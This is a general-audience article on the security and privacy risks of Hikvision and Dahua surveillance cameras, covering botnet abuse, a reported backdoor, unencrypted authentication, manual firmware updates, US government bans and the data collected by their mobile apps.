Hikvision and Dahua surveillance cameras could pose a potential security risk
Two of the biggest surveillance camera providers Hikvision and Dahua could be a potential security risk.
Technology companies Zhejiang Dahua Technology Co., Ltd. and Hangzhou Hikvision Digital Technology Co., Ltd. are two of the biggest surveillance device providers in the world. Both founded in 2001, the two well-established Chinese companies now provide their surveillance cameras to more than 180 countries, with 22% of all surveillance cameras being from Hikvision, a company partially owned by the Chinese goverment.
Both companies have made headlines numerous times over the years, for various reasons. Dahua devices have been exploited to build a botnet to perform the biggest DDoS (distributed denial-of-service) attack to date, and Hikvision has been alleged to be providing cameras for Xinjiang re-education camps. Nevertheless, their cameras are still widely used all over the world, and are presented in various technology exhibitions and conferences. The cameras are used in a number of different fields, including industrial, household, service sectors, traffic control, banking, education, constructions, urban maintenance, and security.
However, there have been some consequences to the controversies involving Hikvision and Dahua. The US has banned the use of both Dahua and Hikvision video surveillance cameras for the US government, US government-funded contracts, and critical infrastructure and national security usage for human rights violations. Both companies are among a number of other organizations that have been placed on the Entity List, which is essentially a government blacklist.
There has also been growing concern that Hikvision and Dahua are slow to address known security problems in their products, potentially putting customers in danger of being spied on. Furthermore, there are worries that the Chinese goverment is using private companies to extend their surveillance.
A number of issues related to Hikvision and Dahua surveillance cameras have been identified by various researchers.
Hikvision and Dahua camera vulnerabilities
In 2016, the largest DDoS attack to date was performed on a site managed by investigative reporter and cybersecurity expert Brian Krebs. The distributed denial-of-service attack targeting krebsonsecurity.com was performed using a botnet, in which the majority of infected devices were Dahua and Dahua OEM. Nearly a million of Dahua devices were infected with the BASHLITE malware and added to the botnet. It was later revealed that a vulnerability in Dahua cameras essentially allowed anyone to take full control of the devices by simply typing in a random username with too many characters, and the botnet operators took advantage of this.
In another instance, a backdoor into many Dahua cameras was identified by a security researcher working for a Fortune 500 company. The company’s network operators discovered that the vulnerability had been activated and data was being sent to unknown IP addresses in China through the company’s firewall. Dahua issued an update to fix the vulnerability but researchers later discovered that the updated firmware still had the same vulnerability just in a different part of the code. Many security researchers believed this to be deliberate. A year later, Dahua cameras were banned from the US market.
Furthermore, surveillance devices from both companies have been noted to have known software vulnerabilities that are publicly available on the Common Vulnerabilities and Exposures database. The vulnerabilities could allow an attacker to remotely intercept information, execute a malicious code and use the devices for DoS attacks.
User authentication is not encrypted
It has been noted that user authentication in both Hikvision and Dahua cameras is done via unencrypted connection using HTTP Digest access authentication. When this authentication method is used, it may allow an attacker to intercept the password when a user is trying to access the camera, decode it and illegally access the camera. This could allow one to illegally intercept the video recording, enable or disable certain features, and/or disrupt regular operations.
Hikvision firmware updates have to be installed manually
Hikvision’s firmware is not updated automatically, users have to manually download and install the updates. Furthermore, according to certain reports, the page providing updates is hosted on a server registered in China, but then routes to a server registered in Russian, from which the update file is downloaded. It has been further noted that user update requests may be logged in these servers, which could allow one to determine the IP address, country, time of request, and the update version.
Having an automatic update feature is highly important in order to keep users secure. Forcing users manually update the firmware and making the update download/install process complicated discourages users from updating, leaving serious vulnerabilities unpatched.
Potential issues with Hikvision and Dahua mobile apps
Hikvision provides a mobile app “Hik-Connect” for managing and configuring the surveillance cameras, checking the feed, and capturing images and videos. It is available for devices running both Android and iOS, and can be downloaded from the Google Play Store and the Apple App store respectively. The app requests permission to access the camera for scanning QR codes, microphone for audio transmission, storage for saving images and videos, phone settings for determining mobile Internet connection strength, and location.
While it does not appear that the app itself has known vulnerabilities, it has been noted that it connects to 9 IP addresses in Ireland, China, Singapore and Thailand. The app also collects, for unknown purposes, device information, such as the SIM cards IMSI and ICCID identification numbers, as well as the device’s IMEI identification number.
Dahua offers a mobile app “gDMSS Plus” for managing the surveillance cameras. The app requests permission to access the camera, microphone, location and storage. Again, the app does not appear to have known vulnerabilities. It connects to 26 IP addresses in US, Germany, and China.